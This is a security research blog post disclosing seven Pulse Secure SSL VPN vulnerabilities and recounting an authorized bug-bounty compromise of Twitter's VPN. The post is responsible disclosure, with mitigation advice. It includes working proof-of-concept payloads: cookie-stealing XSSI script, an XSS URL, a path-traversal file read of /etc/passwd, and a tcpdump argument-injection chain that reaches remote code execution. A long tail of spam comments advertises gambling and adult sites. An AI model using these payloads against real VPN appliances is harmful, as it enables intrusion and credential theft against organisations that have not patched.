2019年9月2日 星期一

Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study!



Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_)
P.S. This is a cross-post blog from DEVCORE




Hi, this is the last part of Attacking SSL VPN series. If you haven’t read previous articles yet, here are the quick links for you:



After we published our research at Black Hat, due to its great severity and huge impacts, it got lots of attention and discussions. Many people desire first-hand news and wonder when the exploit(especially the Pulse Secure preAuth one) will be released.

We also discussed this internally. Actually, we could simply drop the whole exploits without any concern and acquire plenty of media exposures. However, as a SECURITY firm, our responsibility is to make the world more secure. So we decided to postpone the public disclosure to give the world more time to apply the patches!

Unfortunately, the exploits were revealed by someone else. They can be easily found on GitHub[1] [2] [3] and exploit-db[1]. Honestly, we couldn’t say they are wrong, because the bugs are absolutely fixed several months ago, and they spent their time differing/reversing/reproducing. But it’s indeed a worth discussing question to the security community: if you have a nuclear level weapon, when is it ready for public disclosure?

We heard about more than 25 bug bounty programs are exploited. From the statistics of Bad Packet, numerous Fortune 500, U.S. military, governments, financial institutions and universities are also affected by this. There are even 10 NASA servers exposed for this bug. So, these premature public disclosures indeed force these entities to upgrade their SSL VPN, this is the good part.

On the other hand, the bad part is that there is an increasing number of botnets scanning the Internet in the meanwhile. An intelligence also points out that there is already a China APT group exploiting this bug. This is such an Internet disaster. Apparently, the world is not ready yet. So, if you haven’t updated your Palo Alto, Fortinet or Pulse Secure SSL VPN, please update it ASAP!

About Pulse Secure

Pulse Secure is the market leader of SSL VPN which provides professional secure access solutions for Hybrid IT. Pulse Secure has been in our research queue for a long time because it was a critical infrastructure of Google, which is one of our long-term targets. However, Google applies the Zero Trust security model, and therefore the VPN is removed now.



We started to review Pulse Secure in mid-December last year. In the first 2 months, we got nothing. Pulse Secure has a good coding style and security awareness so that it’s hard to find trivial bugs. Here is an interesting comparison, we found the arbitrary file reading CVE-2018-13379 on FortiGate SSL VPN on our first research day…

Pulse Secure is also a Perl lover, and writes lots of Perl extensions in C++. The interaction between Perl and C++ is also confusing to us, but we got more familiar with it while we paid more time digging in it. Finally, we got the first blood on March 8, 2019! It’s a stack-based overflow on the management interface! Although this bug isn’t that useful, our research progress got on track since that, and we uncovered more and more bugs.

We reported all of our finding to Pulse Secure PSIRT on March 22, 2019. Their response is very quick and they take these vulnerabilities seriously! After several conference calls with Pulse Secure, they fixed all bugs just within a month, and released the patches on April 24, 2019. You can check the detailed security advisory!

It’s a great time to work with Pulse Secure. From our perspective, Pulse Secure is the most responsible vendor among all SSL VPN vendors we have reported bugs to!

Vulnerabilities

We have found 7 vulnerabilities in total. Here is the list. We will introduce each one but focus on the CVE-2019-11510 and CVE-2019-11539 more.
  • CVE-2019-11510 - Pre-auth Arbitrary File Reading
  • CVE-2019-11542 - Post-auth(admin) Stack Buffer Overflow
  • CVE-2019-11539 - Post-auth(admin) Command Injection
  • CVE-2019-11538 - Post-auth(user) Arbitrary File Reading via NFS
  • CVE-2019-11508 - Post-auth(user) Arbitrary File Writing via NFS
  • CVE-2019-11540 - Post-auth Cross-Site Script Inclusion
  • CVE-2019-11507 - Post-auth Cross-Site Scripting

Affected versions

  • Pulse Connect Secure 9.0R1 - 9.0R3.3
  • Pulse Connect Secure 8.3R1 - 8.3R7
  • Pulse Connect Secure 8.2R1 - 8.2R12
  • Pulse Connect Secure 8.1R1 - 8.1R15
  • Pulse Policy Secure 9.0R1 - 9.0R3.3
  • Pulse Policy Secure 5.4R1 - 5.4R7
  • Pulse Policy Secure 5.3R1 - 5.3R12
  • Pulse Policy Secure 5.2R1 - 5.2R12
  • Pulse Policy Secure 5.1R1 - 5.1R15

CVE-2019-11540: Cross-Site Script Inclusion

The script /dana/cs/cs.cgi renders the session ID in JavaScript. As the content-type is set to application/x-javascript, we could perform the XSSI attack to steal the DSID cookie!

Even worse, the CSRF protection in Pulse Secure SSL VPN is based on the DSID. With this XSSI, we can bypass all the CSRF protection!

PoC:

<!-- http://attacker/malicious.html -->

<script src="https://sslvpn/dana/cs/cs.cgi?action=appletobj"></script>
<script>
    window.onload = function() {
        window.document.writeln = function (msg) {
            if (msg.indexOf("DSID") >= 0) alert(msg)
        }
        ReplaceContent()
    }
</script>

CVE-2019-11507: Cross-Site Scripting

There is a CRLF Injection in /dana/home/cts_get_ica.cgi. Due to the injection, we can forge arbitrary HTTP headers and inject malicious HTML contents.

PoC:

https://sslvpn/dana/home/cts_get_ica.cgi
?bm_id=x
&vdi=1
&appname=aa%0d%0aContent-Type::text/html%0d%0aContent-Disposition::inline%0d%0aaa:bb<svg/onload=alert(document.domain)>

CVE-2019-11538: Post-auth(user) Arbitrary File Reading via NFS

The following two vulnerabilities (CVE-2019-11538 and CVE-2019-11508) do not affect default configurations. It appears only if the admin configures the NFS sharing for the VPN users.

If an attacker can control any files on remote NFS server, he can just create a symbolic link to any file, such as /etc/passwd, and read it from web interface. The root cause is that the implementation of NFS mounts the remote server as a real Linux directory, and the script /dana/fb/nfs/nfb.cgi does not check whether the accessed file is a symlink or not!

CVE-2019-11508: Post-auth(user) Arbitrary File Writing via NFS

This one is a little bit similar to the previous one, but with a different attack vector!

When the attacker uploads a ZIP file to the NFS through the web interface, the script /dana/fb/nfs/nu.cgi does not sanitize the filename in the ZIP. Therefore, an attacker can build a malicious ZIP file and traverse the path with ../ in the filename! Once Pulse Secure decompresses, the attacker can upload whatever he wants to whatever path!

CVE-2019-11542: Post-auth(admin) Stack Buffer Overflow

There is a stack-based buffer overflow in the following Perl module implementations:
  • DSHC::ConsiderForReporting
  • DSHC::isSendReasonStringEnabled
  • DSHC::getRemedCustomInstructions
These implementations use sprintf to concatenate strings without any length check, which leads to the buffer overflow. The bug can be triggered in many places, but here we use /dana-admin/auth/hc.cgi as our PoC.

https://sslvpn/dana-admin/auth/hc.cgi
?platform=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
&policyid=0

And you can observed the segment fault from dmesg

cgi-server[22950]: segfault at 61616161 ip 0000000002a80afd sp 00000000ff9a4d50 error 4 in DSHC.so[2a2f000+87000]

CVE-2019-11510: Pre-auth Arbitrary File Reading

Actually, this is the most severe bug in this time. It is in the web server implementation. As our slides mentioned, Pulse Secure implements their own web server and architecture stack from scratch. The original path validation is very strict. However, since version 8.2, Pulse Secure introduced a new feature called HTML5 Access, it’s a feature used to interact with Telnet, SSH, and RDP by browsers. Thanks to this new feature, the original path validation becomes loose.

In order to handle the static resources, Pulse Secure created a new IF-CONDITION to widen the originally strict path validation. The code wrongly uses the request->uri and request->filepath, so that we can specify the /dana/html5acc/guacamole/ in the end of the query string to bypass the validation and make request->filepath to any file you want to download!

And it’s worth to mention that in order to read arbitrary files, you must to specify the /dana/html5acc/guacamole/ in the middle of the path again. Otherwise, you can only download limited file extensions such as .json, .xml or .html.

Due to the exploit is in the wild, there is no longer any concern to show the payload:

import requests

r = requests.get('https://sslvpn/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/')
print r.content



CVE-2019-11539: Post-auth(admin) Command Injection

The last one is a command injection on the management interface. We found this vulnerability very early, but could not find a way to exploit it at first. While we were in Vegas, one of my friends told me that he found the same bug before, but he didn’t find a way to exploit it, so he didn’t report to the vendor.

However, we did it, and we exploit it in a very smart way :)

The root cause of this vulnerability is very simple. Here is a code fragment of /dana-admin/diag/diag.cgi:

# ...
$options = tcpdump_options_syntax_check(CGI::param("options"));

# ...
sub tcpdump_options_syntax_check {
  my $options = shift;
  return $options if system("$TCPDUMP_COMMAND -d $options >/dev/null 2>&1") == 0;
  return undef;
}

It’s so obvious and straightforward that everyone can point out there is a command injection at the parameter options! However, is it that easy? No!

In order to avoid potential vulnerabilities, Pulse Secure applies lots of hardenings on their products! Such as the system integrity check, read-only filesystem and a module to hook all dangerous Perl invocations like system, open and backtick

This module is called DSSAFE.pm. It implements its own command line parser and re-implements the I/O redirections in Perl. Here is the code fragments on Gist.

From the code fragments, you can see it replaces the original system and do lots of checks in __parsecmd. It also blocks numerous bad characters such as:

[\&\*\(\)\{\}\[\]\`\;\|\?\n~<>]

The checks are very strict so that we can not perform any command injection. We imagined several ways to bypass that, and the first thing came out of my mind is the argument injection. We listed all arguments that TCPDUMP supports and found that the -z postrotate-command may be useful. But the sad thing is that the TCPDUMP in Pulse Secure is too old(v3.9.4, Sept 2005) to support this juicy feature, so we failed :(

While examining the system, we found that although the webroot is read-only, we can still abuse the cache mechanism. Pulse Secure caches the template result in /data/runtime/tmp/tt/ to speed up script rendering. So our next attempt is to write a file into the template cache directory via -w write-file argument. However, it seems impossible to write a polyglot file in both PCAP and Perl format.

As it seems we had reached the end of argument injection, we tried to dig deeper into the DSSFAFE.pm implementation to see if there is anything we can leverage. Here we found a defect in the command line parser. If we insert an incomplete I/O redirection, the rest of the redirection part will be truncated. Although this is a tiny flaw, it helped us to re-control the I/O redirections! However, the problem that we can’t generate a valid Perl script still bothered us.

We got stuck here, and it’s time to think out of the box. It’s hard to generate a valid Perl script via STDOUT, could we just write the Perl by STDERR? The answer is yes. When we force the TCPDUMP to read a nonexistent-file via -r read-file. It shows the error:

tcpdump: [filename]: No such file or directory

It seems we can “partially” control the error message. Then we tried the filename print 123#, and the magic happens!

$ tcpdump -d -r 'print 123#'
  tcpdump: print 123#: No such file or directory
 
$ tcpdump -d -r 'print 123#' 2>&1 | perl –
  123

The error message becomes a valid Perl script now. Why? OK, let’s have a Perl 101 lesson now!



As you can see, Perl supports the GOTO label, so the tcpdump: becomes a valid label in Perl. Then, we comment the rest with a hashtag. With this creative trick, we can generate any valid Perl now!

Finally, we use an incomplete I/O symbol < to fool the DSSAFE.pm command parser and redirect the STDERR into the cache directory! Here is the final exploit:

-r$x="ls /",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc < 

The concatenated command looks like:

/usr/sbin/tcpdump -d 
 -r'$x="ls /",system$x#'
 2>/data/runtime/tmp/tt/setcookie.thtml.ttc < 
 >/dev/null
 2>&1

And the generated setcookie.thtml.ttc looks like:

 tcpdump: $x="ls /",system$x#: No such file or directory

Once we have done this, we can just fetch the corresponding page to execute our command:

$ curl https://sslvpn/dana-na/auth/setcookie.cgi
 boot  bin  home  lib64       mnt      opt  proc  sys  usr  var
 data  etc  lib   lost+found  modules  pkg  sbin  tmp 
 ...

So far, the whole technical part of this command injection is over. However, we think there may be another creative way to exploit this, if you found one, please tell me!

The Case Study

After Pulse Secure patched all the bugs on April 24, 2019. We kept monitoring the Internet to measure the response time of each large corporation. Twitter is one of them. They are known for their bug bounty program and nice to hackers. However, it’s improper to exploit a 1-day right after the patch released. So we wait 30 days for Twitter to upgrade their SSL VPN.



We have to say, we were nervous during that time. The first thing we did every morning is to check whether Twitter upgrades their SSL VPN or not! It was an unforgettable time for us :P

We started to hack Twitter on May 28, 2019. During this operation, we encounter several obstacles. The first one is, although we can obtain the plaintext password of Twitter staffs, we still can’t log into their SSL VPN because of the Two Factor Authentication. Here we suggest two ways to bypass that. The first one is that we observed Twitter uses the solution from Duo. The manual mentions:

The security of your Duo application is tied to the security of your secret key (skey). Secure it as you would any sensitive credential. Don’t share it with unauthorized individuals or email it to anyone under any circumstances!

So if we can extract the secret key from the system, we can leverage the Duo API to bypass the 2FA. However, we found a quicker way to bypass it. Twitter enabled the Roaming Session feature, which is used to enhances mobility and allows a session from multiple IP locations.

Due to this “convenient” feature, we can just download the session database and forge our cookies to log into their system!



Until now, we are able to access Twitter Intranet. Nevertheless, our goal is to achieve code execution! It sounds more critical than just accessing the Intranet. So we would like to chain our command injection bug(CVE-2019-11539) together. OK, here, we encountered another obstacle. It’s the restricted management interface!

As we mentioned before, our bug is on the management interface. But for the security consideration, most of the corporation disable this interface on public, so we need another way to access the admin page. If you have read our previous article carefully, you may recall the “WebVPN” feature! WebVPN is a proxy which helps to connect to anywhere. So, let’s connect to itself.

Yes, it’s SSRF!  Here we use a small trick to bypass the SSRF protections.



Ahha! Through our SSRF, we can touch the interface now! Then, the last obstacle popped up. We didn’t have any plaintext password of managers. When Perl wants to exchange data with native procedures, such as the Perl extension in C++ or web server, it uses the cache to store data. The problem is, Pulse Secure forgets to clear the sensitive data after exchange, so that’s why we can obtain plaintext passwords in the cache. But practically, most of the managers only log into their system for the first time, so it’s hard to get the manager’s plaintext password. The only thing we got, is the password hash in sha256(md5_crypt(salt, …)) format…

If you are experienced in cracking hashes, you will know how hard it is. So…











We launched a 72 core AWS to crack that.



We cracked the hash and got the RCE successfully! I think we are lucky because from our observation, there is a very strong password policy on Twitter staffs. But it seems the policy is not applied to the manager. The manager’s password length is only ten, and the first character is B. It’s at a very early stage of our cracking queue so that we can crack the hash in 3 hours.

We reported all of our findings to Twitter and got the highest bounty from them. Although we can not prove that, it seems this is the first remote code execution on Twitter! If you are interested in the full report, you can check the HackerOne link for more details.

Recommendations

How to mitigate such attacks? Here we give several recommendations.

The first is the Client-Side Certificate. It’s also the most effective method. Without a valid certificate, the malicious connection will be dropped during SSL negotiation! The second is the Multi-factor Authentication. Although we break the Twitter 2FA this time, with a proper setting, the MFA can still decrease numerous attack surface. Next, enable the full log audit and remember to send to an out-bound log server.

Also, perform your corporate asset inventory regularly and subscribe to the vendor’s security advisory. The most important of all, always keep your system updated!

Bonus: Take over all the VPN clients

Our company, DEVCORE, provides the most professional red team service in Asia. In this bonus part, let’s talk about how to make the red team more RED!

We always know that in a red team operation, the personal computer is more valuable! There are several old-school methods to compromise the VPN clients through SSL VPN before, such as the water-hole attack and replacing the VPN agent.

During our research, we found a new attack vector to take over all the clients. It’s the “logon script” feature. It appears in almost EVERY SSL VPNs, such as OpenVPN, Fortinet, Pulse Secure… and more. It can execute corresponding scripts to mount the network file-system or change the routing table once the VPN connection established.

Due to this “hacker-friendly” feature, once we got the admin privilege, we can leverage this feature to infect all the VPN clients! Here we use the Pulse Secure as an example, and demonstrate how to not only compromise the SSL VPN but also take over all of your connected clients:


Epilogue

OK, here is the end of this Attacking SSL VPN series! From our findings, SSL VPN is such a huge attack surface with few security researchers digging into. Apparently, it deserves more attention. We hope this kind of series can encourage other researchers to engage in this field and enhance the security of enterprises!

Thanks to all guys we met, co-worked and cooperated. We will publish more innovative researches in the future :)


298 則留言:

  1. Amazing research and nicely written. Thanks for sharing mate!

    回覆刪除
  2. Orange this is really impressive! thanks for share this awesome research!
    @ak1t4

    回覆刪除
  3. 請問是怎麼獲得twitter員工的明文密碼的?是社工庫嗎

    回覆刪除
  4. 为你们称赞,非常感谢分享

    回覆刪除
  5. Great article and PoC writeup//code. Loved this. Feel free to send articles and follow our cyber security site https://thecyberpost.com

    回覆刪除
  6. I blog often and I truly appreciate your content.
    야설

    Feel free to visit my blog :
    야설

    回覆刪除
  7. I’m going to bookmark your site and keep checking for new details about once per week.
    국산야동
    Feel free to visit my blog : 국산야동

    回覆刪除
  8. Hi there! This article could not be written much better!
    야설
    Feel free to visit my blog : 야설

    回覆刪除
  9. Wow! Thank you! I continuously needed to write on my site something like that. Can I include a part of your post to my site?
    토토사이트

    回覆刪除
  10. There’s definately a great deal to find out about this topic.
    I like all the points you have made.Click Me Here슬롯머신


    3YANGSKIE

    回覆刪除
  11. I'm so happy to finally find a post with what I want. 안전놀이터순위 You have inspired me a lot. If you are satisfied, please visit my website and leave your feedback.

    回覆刪除
  12. Thankyou for all your efforts that you have put in this. very interesting info .Click Here청마담


    8YAnGsKIE

    回覆刪除
  13. Hey there! I could have sworn I’ve been to this website before but after reading through some of the post I realized it’s new to me. Nonetheless, I’m definitely happy I found it and I’ll be book-marking and checking back frequently ty le keo

    回覆刪除
  14. I’m not sure where you’re getting your information 야설, but great topic. I needs to spend some time learning much more or understanding more. Thanks for great information I was looking for this info for my mission.

    回覆刪除
  15. Excellent blog right here! Additionally your website a lot up very fast! What web host are you the usage of? Can I am getting your affiliate hyperlink on your host? I want my website loaded up as quickly as yours lol 오피

    回覆刪除
  16. Have you ever considered about adding a little bit more than just your articles? 외국인출장

    回覆刪除
  17. "I mean, what you say is fundamental and all.
    However think about if you added some great images
    or video clips to give your posts more, pop! Your content is excellent but with pics and videos, this website could certainly be one of the best in its field. Awesome blog!"

    마사지

    回覆刪除
  18. I will recommend your website to everyone. You have a very good gloss. Write more high-quality articles. I support you.
    온라인카지노

    回覆刪除
  19. I finally found great post here. Thanks for the information. Please keep sharing more articles.
    스포츠토토

    回覆刪除
  20. Hard to ignore such an amazing article like this. You really amazed me with your writing talent. Thank you for sharing again.
    바카라사이트

    回覆刪除
  21. Excellent website. Lots of helpful info here. I am sending it to some friends ans additionally sharing in delicious. And naturally, thanks for your sweat! 스포츠토토

    回覆刪除
  22. As I website possessor I believe the content material here is rattling great , appreciate it for your efforts. You should keep it up forever! Good Luck. 바카라사이트

    回覆刪除
  23. It seems too complicated and very broad for me. I am looking forward for your next post, I will try to get the hang of it! 파워볼

    回覆刪除
  24. Thank you for sharing superb informations. Your site is so cool. I am impressed by the details that you? Ive on this website. 카지노사이트

    回覆刪除
  25. I not sure where by you are helping your info, although good subject matter. When i would need to spend some time finding out more or maybe realizing far more. บาคาร่า

    回覆刪除
  26. Hello, I read the post well. 안전놀이터추천 It's a really interesting topic and it has helped me a lot. In fact, I also run a website with similar content to your posting. Please visit once

    回覆刪除
  27. 토토사이트 Excellent article. Keep posting such kind of information on your site.
    Im really impressed by your site.
    Hey there, You’ve done a great job. I will definitely digg it and in my view
    recommend to my friends. I’m sure they will be benefited from this website.

    回覆刪除
  28. 스포츠토토 Pretty good post. I just stumbled upon your blog and wanted to say that I have really enjoyed reading your blog posts. Any way I’ll be subscribing to your feed and I hope you post again soon.

    回覆刪除
  29. Hello there, You’ve done an incredible job. I will definitely digg it and personally recommend to my friends. I’m confident they’ll be benefited from this website.|
    온라인카지노

    回覆刪除
  30. 카지노사이트 I'm not positive the place you're getting your info, however good topic.

    I needs to spend a while learning much more or understanding more.
    Thank you for magnificent info I used to be looking for this info for my mission.

    回覆刪除
  31. I do not even know how I ended up here, but I thought this post was good. I do not know who you are but definitely you are going to a famous blogger if you aren’t already ?? Cheers!
    II먹튀검증

    回覆刪除
  32. Hello there! Quick question that’s completely off topic.
    Do you know how to make your site mobile friendly? My website looks weird when viewing from my iphone.
    I’m trying to find a template or plugin that might
    be able to resolve this issue. If you have any recommendations, please share.
    Thank you!

    website:경마


    回覆刪除
  33. Thanks for sharing your info. I truly appreciate your efforts and I will be waiting for your next
    write ups thank you once again. 토토

    回覆刪除
  34. I’ve been absent for a while, but now I remember why I used to love this website. Thank you, I will try and check back more often. How frequently you update your site?

    야한소설

    回覆刪除
  35. An outstanding share! I have just forwarded this onto a co-worker who was doing a little homework on this. And he actually bought me dinner simply because I discovered it for him… lol. So let me reword this…. Thanks for the meal!! But yeah, thanks for spending some time to talk about this topic here on your web site.

    대딸방

    回覆刪除
  36. Its like you read my mind! You appear to know so much about this, like you wrote the book in it or something. I think that you can do with some pics to drive the message home a bit, but instead of that, this is magnificent blog. An excellent read. I’ll definitely be back.

    스포츠마사지

    回覆刪除
  37. I am also commenting to make you understand what a notable experience my friend’s child gained studying your webblog. She realized so many things, with the inclusion of what it is like to have a marvelous giving character to make men and women completely fully grasp some tricky subject matter. You undoubtedly surpassed readers’ expected results. Thank you for offering those great, healthy, educational as well as fun thoughts on your topic to Emily.

    출장마사지

    回覆刪除
  38. Buying a business does not have to be a complicated endeavor when the proper process and methodology is followed. In this article, we outline eleven specific steps that should be adhered to when buying a business and bank financing is planned to be utilized. 메이저토토사이트추천

    回覆刪除
  39. Very nice article and straight to the point. I don’t know if this is truly the best place to ask but do you folks have any idea where to get some professional writers? Thank you. 슬롯머신

    回覆刪除
  40. Howdy! Do you know if they make any plugins to assist with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good results. If you know of any please share. Cheers! 먹튀검증커뮤니티

    回覆刪除
  41. After exploring a handful of the blog posts on your blog, I seriously like your way of writing a blog.

    무료야설

    回覆刪除
  42. Right away I am ready to do my breakfast, after having my breakfast coming over again to read other news.

    출장안마

    回覆刪除
  43. Thanks for ones marvelous posting! I truly enjoyed reading it, you might be a great author. I will make sure to bookmark your blog and will come back in the future. I want to encourage that you continue your great job, have a nice evening!

    타이마사지

    回覆刪除
  44. Good post however I was wanting to know if you could write a litte more on this subject? I’d be very thankful if you could elaborate a little bit further. Cheers!

    回覆刪除
  45. Interesting blog this. its quite informative article.

    回覆刪除
  46. Nice article I agree with this.Your blog really nice. Its sound really good

    回覆刪除
  47. Thanks for sharing with us this important Content. I feel strongly about it and really enjoyed learning more about this topic.

    回覆刪除
  48. Hi there, I found your blog via Google while searching for a related topic, your site came up, it looks great. I’ve bookmarked it in my google bookmarks. 경마사이트


    回覆刪除
  49. I think I have never observed such web journals ever that has finish things with all points of interest which I need. So sympathetically refresh this ever for us. This is very interesting, Feel free to visit my website; 먹튀검증가이드

    回覆刪除
  50. This is also a very good post which I really enjoy reading. It is not everyday that I have the possibility to see something like this. Feel free to visit my website; 카지노사이트링크

    回覆刪除
  51. Thank you. I authentically greeting your way for writing an article. I safe as a majority loved it to my bookmark website sheet list and will checking rear quite than later. Share your thoughts.

    텍사스홀덤

    回覆刪除
  52. Thank you so much for reading your post. Your writing was helpful in my life.You brought my life back to life. Thank you so much and thank you so much.
    안전놀이터

    回覆刪除
  53. kadın topuklu ayakkabı fiyatları
    https://www.bakgiy.com/

    回覆刪除

  54. 먹튀없는 온라인 카지노
    온라인크리스탈바카라
    생동감 넘치는 온라인 카지노
    온라인크리스탈카지노
    이벤트가 많은 카지노
    크리스탈카지노
    다양한 슬롯머신
    크리스탈카지노
    만족도 상위 0.1% 카지노
    온라인크리스탈카지노

    回覆刪除
  55. whoah this blog is wonderful i really like studying your articles.
    Keep up the good work! You already know, many persons are searching around for
    this information, you can aid them greatly.

    回覆刪除
  56. Thanks for sharing this marvelous post. I m very pleased to read this article.

    回覆刪除
  57. That's a great article! The neatly organized content is good to see. Can I quote a blog and write it on my blog? My blog has a variety of communities including these articles. Would you like to visit me later? 토토사이트추천

    回覆刪除
  58. Hi there, just wanted to say, I enjoyed this post. It was funny.
    Keep on posting! 카지노사이트

    回覆刪除
  59. appreciate it for your hard work. You should keep it up forever! Best of luck. 바카라사이트


    回覆刪除
  60. Hard to ignore such an amazing article like this. You really amazed me with your writing talent. Thank for you shared again.

    回覆刪除
  61. Thank you for sharing this useful article , and this design blog simple and user friendly regards.

    回覆刪除
  62. Your information was very useful to me. That’s exactly what I’ve been looking for

    回覆刪除
  63. I can read all the opinions of others as well as i gained information to each and everyone here on your site. Just keep on going dude. Check over here

    回覆刪除
  64. It’s hard to come by well-informed people in this particular subject, however, you seem like you know what you’re talking about! Thanks


    https://www.betmantoto.pro

    回覆刪除
  65. I read this article. I think You put a lot of effort to create this article. I appreciate your work. Joker Yellow Vest

    回覆刪除
  66. In my opinion, the item you posted is perfect for being selected as the best item of the year. You seem to be a genius to combine 먹튀사이트 and . Please think of more new items in the future!

    回覆刪除
  67. Thank you so much for sharing this information, this will surely help me in my work and therefore, I would like to tell you that very few people can write in a manner where the reader understands just by reading the article once.

    回覆刪除
  68. Your ideas inspired me very much. roulette It's amazing. I want to learn your writing skills. In fact, I also have a website. If you are okay, please visit once and leave your opinion. Thank you.


    回覆刪除
  69. I’m very pleased to discover this site. I want to to thank you for ones time for this particularly wonderful read!! I definitely savored every part of it and i also have you saved as a favorite to see new information on your blog. 메이저토토사이트

    回覆刪除
  70. “I’m excited to uncover this page. I wanted to thank you for ones time just for this fantastic read!! I definitely loved every part of it and I have you book marked to see new things in your site.”

    回覆刪除
  71. Can I simply say what a relief to find somebody who really understands what they are discussing on the web.

    回覆刪除
  72. Great blog! Do you have any tips for aspiring writers? I’m hoping to start my own blog soon but I’m a little lost on everything.

    파칭코사이트인포

    回覆刪除
  73. Hi there, after reading this remarkable paragraph i am too happy to share my experience here with friends.

    回覆刪除
  74. After searching for a great site. I was so impressed to yours. This will probably give me ideas for my work. Thank you

    回覆刪除
  75. I do trust all of the ideas you've introduced
    in your post. They're really convincing and will certainly
    work. Still, the posts are very short for beginners.
    Could you please prolong them a little from subsequent time?
    Thanks for the post. 토토사이트

    回覆刪除
  76. I found this article on this site while looking for an article on this topic. Reading your post made me feel like an expert in this field. There are several articles on these topics posted on my site. Please visit my website once. 메리트카지노

    回覆刪除
  77. Wow! Thank you! I continuously needed to write on my site something like that. Can I include a part of your post to my site?
    스포츠토토

    回覆刪除
  78. Hello, I am one of the most impressed people in your article. 토토사이트순위 I'm very curious about how you write such a good article. Are you an expert on this subject? I think so. Thank you again for allowing me to read these posts, and have a nice day today. Thank you.

    回覆刪除
  79. To an extraordinary degree beautiful and enthralling post. I was chasing down this sort of data and recognized inspecting this one. Continue posting. Grateful for sharing. 토토

    回覆刪除
  80. This is an excellent post I seen thanks to share it. It is really what I wanted to see hope in future you will continue for sharing such a excellent post. 온라인카지노

    回覆刪除
  81. This is a smart blog. I mean it. You have so much knowledge about this issue, and so much passion. You also know how to make people rally behind it, obviously from the responses. 파워볼게임

    回覆刪除
  82. Right away this website will probably unquestionably usually become well known with regards to most of website customers, as a result of meticulous accounts and in addition tests. 카지노

    回覆刪除
  83. Nhà cái lừa đảo2021年11月25日 下午3:07

    While looking for articles on these topics, I came across this article on the site here. As I read your article, I felt like an expert in this field. I have several articles on these topics posted on my site. Could you please visit my homepage? Nhà cái lừa đảo


    回覆刪除
  84. Decent data, profitable and phenomenal outline, as offer well done with smart thoughts and ideas, bunches of extraordinary data and motivation, both of which I require, on account of offer such an accommodating data here 토토사이트

    回覆刪除
  85. Pretty useful article. I merely stumbled upon your internet site and wanted to say that I’ve very favored learning your weblog posts. Any signifies I’ll be subscribing with your feed and I hope you publish once additional soon. 메이저사이트

    回覆刪除
  86. So good indeed! Glad to have found your page!! This is such great work!! Interesting to read for sure!! 블랙잭사이트

    回覆刪除
  87. Excellent blog. keep up the nice work.
    http://drsamwomensclinic.co.za

    回覆刪除
  88. Great web site you have got here.. It’s hard to find quality writing like yours these days. I really appreciate individuals like you! Take care!! 파워볼게임

    回覆刪除
  89. Really informative post. I personally thought the written post is well suited and trouble-free for me to go after provided guideline. visit this site to find out more 경마

    回覆刪除
  90. Great work ! This is the type of information that are supposed to be shared across the internet. 슬롯머신

    回覆刪除
  91. Good day! I could have sworn I’ve been to your blog before but after going through many of the articles I realized it’s new to me. 토토

    回覆刪除
  92. You were great and everyone received so much from your experience and knowledge. Absolutely amazing, thank you for sharing your knowledge with me. 카지노사이트핫

    回覆刪除
  93. Its like you read my mind! You appear to know so much about this, like you wrote the book in it or something. 토토

    回覆刪除
  94. The kind and easy-to-understand explanation made it easy to understand difficult topics. Your writing skills are great. I want to learn great writing skills. 파칭코

    回覆刪除
  95. I like what you guys are up also. Such clever work and reporting! Carry on the excellent works guys I've incorporated you guys to my blogroll. I think it will improve the value of my website.

    카지노사이트가이드

    回覆刪除
  96. I finally found what I was looking for! I'm so happy. 안전한놀이터 Your article is what I've been looking for for a long time. I'm happy to find you like this. Could you visit my website if you have time? I'm sure you'll find a post of interest that you'll find interesting.

    回覆刪除
  97. I accidentally searched and visited your site. I still saw several posts during my visit, but the text was neat and readable. I will quote this post and post it on my blog. Would you like to visit my blog later? keonha cai


    回覆刪除
  98. Howdy! I could have sworn I've been to this site before but after checking through some of the post I realized
    it's new to me. Anyhow, I'm definitely delighted I found it and
    I'll be book-marking and checking back frequently!


    https://www.safecasinosite.net

    回覆刪除
  99. I admire this article for the well-researched content and excellent wording. I got so involved in this material that I couldn’t stop reading. I am impressed with your work and skill. Thank you so much. ufabet

    回覆刪除
  100. When did you start writing articles related to ? To write a post by reinterpreting the 메리트카지노 I used to know is amazing. I want to talk more closely about , can you give me a message?

    回覆刪除
  101. When I read your article on this topic, the first thought seems profound and difficult. There is also a bulletin board for discussion of articles and photos similar to this topic on my site, but I would like to visit once when I have time to discuss this topic. sòng bạc


    回覆刪除
  102. page and would like you to keep updated on news. And upload current articles for us to read continuously For thorough tracking ทางเข้าเล่น pg slot

    回覆刪除
  103. page and would like you to keep updated on news. And upload current articles for us to read continuously For thorough tracking pg slot

    回覆刪除
  104. Your post is very helpful and information is reliable. I am satisfied with your post. Thank you so much for sharing this wonderful post. If you have any assignment requirement then you are at the right place. 메이저사이트

    回覆刪除
  105. I am really enjoying reading your well written articles. It looks like you spend a lot of effort and time on your blog. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work. ufabet

    回覆刪除
  106. I am very impressed with your writing카지노게임 I couldn't think of this, but it's amazing! I wrote several posts similar to this one, but please come and see!

    回覆刪除
  107. This is the perfect post.casino trực tuyến It helped me a lot. If you have time, I hope you come to my site and share your opinions. Have a nice day.


    回覆刪除
  108. Hello! I could have sworn I've been to this site before but after checking through some of the post I realized it's new to me. Nonetheless, I'm definitely happy I found 메이저토토사이트 and I'll be book-marking and checking back frequently!

    回覆刪除
  109. 카지노사이트2022年1月5日 下午5:58

    I have been looking for articles on these topics for a long time. 카지노사이트 I don't know how grateful you are for posting on this topic. Thank you for the numerous articles on this site, I will subscribe to those links in my bookmarks and visit them often. Have a nice day


    回覆刪除
  110. Traditional bookstores have always existed on high streets, but in the digital age, the internet is proving to become a serious competitor to traditional brick and mortar stores. This article examines both sides of the coin and provides an appropriate insight into the phenomenon of shopping of books online. 메이저사이트추천

    回覆刪除
  111. 온라인카지노2022年1月9日 下午4:33

    It's too bad to check your article late. I wonder what it would be if we met a little faster. I want to exchange a little more, but please visit my site 온라인카지노 and leave a message!!


    回覆刪除
  112. 안전놀이터2022年1月9日 下午5:51

    You make so many great points here that I read your article a couple of times. Your views are in accordance with my own for the most part. This is great content for your readers. 안전놀이터


    回覆刪除
